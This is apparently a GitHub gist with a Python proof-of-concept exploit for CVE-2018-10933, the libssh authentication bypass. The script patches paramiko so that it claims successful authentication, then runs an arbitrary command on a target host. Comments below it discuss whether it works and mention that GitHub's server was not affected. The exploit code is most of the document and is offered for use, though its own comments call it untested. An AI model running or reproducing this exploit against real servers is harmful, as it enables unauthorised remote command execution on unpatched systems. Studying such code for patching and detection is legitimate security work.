Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
'''
# fixed - test by thinkycx and
Traceback (most recent call last):
File "10933.py", line 12, in <module>
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_SUCCESS]
TypeError: 'property' object has no attribute '__getitem__'
pip install paramiko==2.0.8
'''
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_USERAUTH_SUCCESS]
def auth_accept(*args, **kwargs):
return new_auth_accept(*args, **kwargs)
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})
port = 22
try:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
stdin, stdout, stderr = client.exec_command(command)
print stdout.read(),
finally:
client.close()
@thinkycx

This comment has been minimized.

Copy link
Owner Author

commented Oct 17, 2018

Note

OpenSSH/Development which includes for libssh the following statement : "... libssh is an independent project ..."

Github: We use a custom version of libssh; SSH2_MSG_USERAUTH_SUCCESS with libssh server is not relied upon for pubkey-based auth, which is what we use the library for. Patches have been applied out of an abundance of caution, but GHE was never vulnerable to CVE-2018-10933.

ref

@thovt93

This comment has been minimized.

Copy link

commented Oct 17, 2018

It not work guy

@thinkycx

This comment has been minimized.

Copy link
Owner Author

commented Oct 21, 2018

It not work guy

Hello,maybe it‘s difficult to get shell . You can only see that your channel session is auth success.

For more info, see here with google translation.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.